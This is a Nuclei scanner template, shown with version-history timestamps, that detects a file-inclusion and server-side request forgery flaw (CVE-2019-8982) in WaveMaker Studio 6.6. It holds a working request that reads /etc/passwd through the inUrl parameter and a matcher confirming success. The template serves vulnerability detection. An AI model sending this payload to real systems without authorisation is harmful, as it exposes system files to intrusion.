nuclei-templates/http/cves/2019/CVE-2019-8982.yaml

47 lines
1.8 KiB
YAML
Raw Normal View History

2021-01-02 04:59:06 +00:00
id: CVE-2019-8982
info:
name: Wavemaker Studio 6.6 - Local File Inclusion/Server-Side Request Forgery
author: madrobot
severity: critical
description: "WaveMaker Studio 6.6 mishandles the studioService.download?method=getContent&inUrl= value in com/wavemaker/studio/StudioService.java, leading to disclosure of local files and server-side request forgery."
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of these vulnerabilities could lead to unauthorized access to sensitive files and potential server-side request forgery attacks.
2023-09-06 12:53:28 +00:00
remediation: |
Apply the latest security patches and updates provided by Wavemaker Studio to mitigate these vulnerabilities.
reference:
- https://www.exploit-db.com/exploits/45158
- https://nvd.nist.gov/vuln/detail/CVE-2019-8982
- https://github.com/merlinepedra25/nuclei-templates
- https://github.com/sobinge/nuclei-templates
- https://github.com/ARPSyndicate/cvemon
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
cvss-score: 9.6
cve-id: CVE-2019-8982
cwe-id: CWE-918
2024-05-31 19:23:20 +00:00
epss-score: 0.01814
epss-percentile: 0.88158
2023-09-06 12:53:28 +00:00
cpe: cpe:2.3:a:wavemaker:wavemarker_studio:6.6:*:*:*:*:*:*:*
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: wavemaker
product: wavemarker_studio
tags: cve,cve2019,wavemaker,lfi,ssrf,edb
http:
- method: GET
path:
- "{{BaseURL}}/wavemaker/studioService.download?method=getContent&inUrl=file///etc/passwd"
2023-07-11 19:49:27 +00:00
matchers-condition: and
matchers:
- type: regex
2023-07-11 19:49:27 +00:00
part: body
regex:
2021-07-24 21:35:55 +00:00
- "root:.*:0:0:"
2023-07-11 19:49:27 +00:00
- type: status
status:
- 200
# digest: 4b0a00483046022100c8419bc77859a442fcd8d0612de209ebc80b5675ad34980b28a4d5d8e815926e022100e8ae9bdb070d9549bc1f8a3cf90261d0d0346c3621f06f65b273d9ad0c059f16:922c64590222798bb761d5b6d8e72950